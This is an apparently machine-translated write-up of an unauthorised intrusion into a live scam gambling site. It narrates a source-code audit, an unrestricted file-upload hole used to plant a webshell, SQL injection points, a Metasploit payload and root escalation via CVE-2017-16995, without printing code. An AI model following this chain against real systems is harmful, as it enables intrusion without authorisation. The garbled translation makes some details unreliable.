Title: One dragon penetration against BC pig killing

0X00         According to the wrong end

I accidentally encountered a set of garbage spinach website pig killing disk

Accessing the scanned directories and files one by one does not help much, but the background address is found. phpmyadmin access 500.

Visit xd.php to the background to access it to find that you also need to authorize the verification code

I tried 8888, 123456 and other things all prompted errors and closed them on the spot.

There is only one subdomain explosion attempt. Nothing was found in Nmap scans. Returning to the homepage, I found that url is a bit uncommon.

0X01    Looking for similar websites and source codes

Such frauds rarely develop the source code. It is certain that the source code is downloaded from the Internet and found someone to build it. Uncommon is the feature, so I searched it.

0X02    Start audit

The source code of so many websites must be a mess, so I spent some time finding the source code and trying to audit it.

Download the source code and scan it with seay. The source code is too big and I am too lazy to build it locally. I directly use the source code to criticize the target.

I found a fileupload.php file from it and it seems to be a bit problematic.

The access target discovers that the file also exists. Extract the file and test it in a locally built environment.

Direct access will automatically create two folders upload and upload_tmp. This thing is a demo point. This point actually looks more like a backdoor.

And the filename variable is completely controllable.

Continue to read down and find some judgments. You can upload the name of the form to file. If you upload the file, don’t worry about other files, just change the upload form. Just add the parameters name and file.

Name parameter controls upload file name aaa.php

Select 1.jpg upload

There is no return path after upload, but the aaa.php file already exists under upload. SQL Injection

The value of where in the variable comes from the request, and there is no value of type detected in the checkinput above.

Follow betListCnt

It is directly brought into the query without any processing, and there are many similar points.

0X03    Verification of audited vulnerabilities

Get the webshell through the previous upload and try to increase the rights.

It was found to be debian. I found that there is port 6379 but not started by root user

After looking at the kernel version, I feel it should be OK, so I try to find exp with permissions.

Generate msf horse

For the convenience, I used msf to launch this machine. Then look for the corresponding escalation exp.

0X04    Try to raise rights

Found these two CVE-2019-13272 and CVE-2017-16995 When I was looking for the utilization tool on github, I remembered that msf actually comes with the right-to-rights. So I tried to search

Use it if you search

The result failed on the spot

Try the second CVE-2017-16995

successfully returned a session with root permissions. The privilege escalation was completed and reproduced in the original link: https://mp.weixin.qq.com/s/Yh0qq5imlfHhNQnbtPfxcA